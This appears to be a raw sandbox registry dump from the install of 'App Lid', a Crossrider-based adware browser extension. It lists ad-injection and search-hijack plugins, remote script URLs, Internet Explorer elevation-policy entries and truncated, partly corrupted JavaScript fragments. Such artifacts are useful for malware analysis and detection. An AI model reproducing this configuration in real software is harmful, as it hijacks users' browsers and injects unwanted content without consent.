[HKCU\Software\AppDataLow\Software\App Lid\Plugins\183]
"Name" = "tabsWrapper"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\262]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY2MTUyNDE0NzU3NDcwZTEyMDAxNDNlMDAwZDQ1NGQ0NTQ0MGUwMDEwMWI0ODRlNDgxNDAxMDgwNTE1MDcwMzE3NTA0YTE2NGIwNzBkMTUwOTBhMWIwOTAzNTkwYjAzMTI1YjE3MWUxMDRlMTE0NDU3NTc1ZjE2MDA0NDJkM2UyNDI1MmEzNTM1MjYyZDJmMzczMzM4MzIzZDMyMjMzYTIwMmUzNjNlMzQyMjI3MzkyZjMwM2IzNDVkMGQ0OTFkMTY1OTE2MWQwMDU2NDM1NjU1NDc0MzAzMWUwMDU5MzQyZDIyMzUzODM2MzUzNDNkMjAyZTIwM2UyNjI3MzUzOTI4MzUyOTJlMmQzZTQxMDQxYzE1MTIxMTA5MDIxNjVjMzgyODI2MzQyOTI3MzczOTNiMjUyMjI1M2EyZjI4MjczMDJhM2UyZDIyMjUzYTMzMzUzMTM2MzQzYjI1MzgyODQ3NGE2YzU0NDQ0YjUyNDMwZjAzMTExNjE1MjExNjA3NTA1YjQ3NTUwZDEyMTIwNDE3NTE1ZDRlMDQxMzBiMDUwNzE3MGMwZTQzNGMwNjU5MDQwZDA3MTkwNTAyMWEwNTQ5MTkwMDEyNDkwNzExMDk1ZDE3NTQ0NTU0NWYwNDEwNGIzNDJkMjIzNTM4MzYzNTM0M2QyMDJlMjAzZTIyMmYzMTIzMjgzMDIxMmYyZDMyMzIzNTNhMmYyMjJiM2I0NDFlNGYwZDA0NWExNjBmMTA1OTVhNDU1MzU3NTEwMDFlMTI0OTNiMzQzMTMzMjgyNDM2MzQyZjMwMjEzOTJkMjAzNzI3M2EyODI3MzkyMTM0MmQ0NzE0MGUxNjEyMDMxOTBkMGY0ZjNlMzgzNDM3MjkzNTI3MzYyMjM2MjQzNTI4MmMyODM1MjAyNTI3M2UyNDM1MjgzMDM1MjMyNjNiMjIzNjNlMzg1NTQ5NmM0NjU0NDQ0YjUwMTEwYjAyMDI玕Ŗ"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\64]
"Version" = "3"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\17]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/17.js"
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"DisableIe" = "true"
"UninstallerOfferUrl" = "NA"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\94]
"Name" = "IEPopup"
[HKCU\Software\AppDataLow\Software\App Lid\Installer]
"Time" = "1422513827"
"AdditionalInfo" = "{""asw"":[0, 1073750533, -2147483648, 0],""browser_name"":""ie""
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\263]
"Name" = "intext_5_j_m"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a96c2976-ee5b-4f1e-824c-c00fd74dd873}]
"AppName" = "App Lid-buttonutil64.exe"
[HKCU\Software\AppDataLow\Software\App Lid\Installer]
"subid" = "0"
[HKLM\SOFTWARE\InstalledBrowserExtensions\25286\Status]
"Installed" = "1"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\262]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/262.js"
[HKCU\Software\AppDataLow\Software\App Lid\Installer]
"DefaultBrowser" = "ie"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
"AppName" = "App Lid-codedownloader.exe"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\4]
"Version" = "5"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\14]
"Name" = "CrossriderUtils"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\288]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/288.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\253]
"Version" = "2"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
"AppPath" = "%Program Files% (x86)\App Lid"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\184]
"Version" = "11"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\288]
"Version" = "1"
[HKCU\Software\InstalledBrowserExtensions\25286]
"65743" = "App Lid"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\46]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setInÅ–"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\40]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActiÅ–"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\43]
"Version" = "5"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberOÅ–"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\253]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/253.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\94]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/94.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\242]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/242.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\13]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/13.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\252]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[252]=function(){var f=function(m,n,l,k){while(l.length
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"Version" = "21"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\39]
"Version" = "5"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\22]
"JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}elÅ–"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\262]
"Name" = "pops_5_j_m"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\200]
"Version" = "4"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\64]
"Name" = "appApiMessage"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\345]
"Name" = "pluginsVerticals"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\252]
"Version" = "10"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\223]
"Name" = "imonomy_m"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
"AppName" = "App Lid-bg.exe"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\246]
"Name" = "setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"ChangePrevious" = "false"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\3]
"Name" = "ie8_fix_2"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
"AppName" = "App Lid-buttonutil.exe"
[HKCU\Software\AppDataLow\Software\App Lid\Installer]
"srcid" = "000820"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\234]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/234.js"
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"UninstallerOfferAction" = "NA"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\182]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/182.js"
[HKCU\Software\AppDataLow\Software\Crossrider]
"Bic" = "AC5F59911E7B4F9F831F542369865C6AIE"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\31ec1c24\PUPautoinsaller_v1.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\31ec1c24\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\6c88b866\python.dll, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\6c88b866\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\biclient.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\422.json, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\422.db, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\STab_Down_6.0.6.6.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\wpm_v20.0.0.1714.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\XTab_v4.0.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\,"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\47]
"JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:[""\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x73\x6f""
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\221]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\43]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to parsÅ–"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
"DisplayName" = "App Lid"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a96c2976-ee5b-4f1e-824c-c00fd74dd873}]
"AppPath" = "%Program Files% (x86)\App Lid"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\35]
"Version" = "4"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\37]
"Name" = "IEBrowserEvents"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\301]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/301.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\253]
"Name" = "pixel_inject"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\177]
"Version" = "2"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\35]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/35.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\42]
"JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;Å–"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
"AppPath" = "%Program Files% (x86)\App Lid"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\223]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/223.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\13]
"Name" = "CrossriderAppUtils"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\91]
"Name" = "monetizationLoader.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^(?:)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.seÅ–"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\4]
"Name" = "jquery_1_7_1"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\39]
"Name" = "IEDatabase"
[HKCU\Software\AppDataLow\Software\App Lid\Installer]
"FullVersionForUrl" = "1_36_01_22"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION]
"App Lid-bg.exe" = "8000"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Wow6432Node\App Lid\Installer]
"BundledIe" = "1"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\221]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/221.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\37]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/37.js"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
"AppPath" = "%Program Files% (x86)\App Lid"
[HKLM\SOFTWARE\Wow6432Node\AppDataLow\Software\Crossrider]
"Verifier" = "705e42e0bb6c74a04369956d99485df5"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\223]
"Version" = "9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
"Policy" = "1"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
"AppPath" = "%Program Files% (x86)\App Lid"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\220]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/220.js"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
"AppPath" = "%Program Files% (x86)\App Lid"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\242]
"Name" = "price_gong_m"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\42]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/42.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\102]
"Version" = "11"
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"AddressbarURL" = "NA"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\177]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/177.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\180]
"Name" = "bpo_serp_m"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\3]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/3.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\22]
"Version" = "6"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\37]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100),focusTimer:(typeof b.focusTimer===number?b.focusTimer:0),focusDelay:(typeof b.focusDelay===number?b.focusDelay:0)};appAPI.Å–"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\42]
"Name" = "IEInternal"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\183]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functiÖÂÂÅ–"
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"PluginsManifestVersion" = "17"
[HKCU\Software\AppDataLow\Software\App Lid\Installer]
"FullVersion" = "1.36.01.22"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\183]
"Version" = "4"
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"ThanksUrl" = "NA"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\72]
"JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=pÅ–"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\345]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/345.js"
[HKLM\SOFTWARE\Wow6432Node\AppDataLow\Software\Crossrider]
"Bic" = "AC5F59911E7B4F9F831F542369865C6AIE"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\9]
"Name" = "search_engine_hook"
[HKCU\Software\AppDataLow\Software\App Lid\Installer]
"ErrorsDomain" = "http://errors.ourclientinputsrv.com"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\1]
"Name" = "base"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\43]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/43.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\78]
"Name" = "CrossriderInfo"
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"PublisherName" = "Lid"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\255]
